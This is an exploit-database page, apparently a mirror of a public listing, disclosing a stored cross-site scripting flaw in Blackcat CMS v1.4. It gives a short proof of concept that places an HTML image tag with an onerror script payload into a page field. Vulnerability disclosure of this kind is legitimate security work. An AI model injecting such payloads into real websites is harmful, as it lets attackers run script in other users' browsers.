Blackcat cms v1.4 stored xss Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-07-19 | Type : webapps | Platform : php
This exploit / vulnerability Blackcat cms v1.4 stored xss is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

Exploit Title: Blackcat Cms v1.4 - Stored XSS
Application: blackcat Cms
Version: v1.4
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux


2. Technical Details & POC
========================================
steps:

1. login to account
2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
3. set as <img src=x onerror=alert(4)>
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1

Blackcat cms v1.4 stored xss


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Blackcat cms v1.4 stored xss Vulnerability / Exploit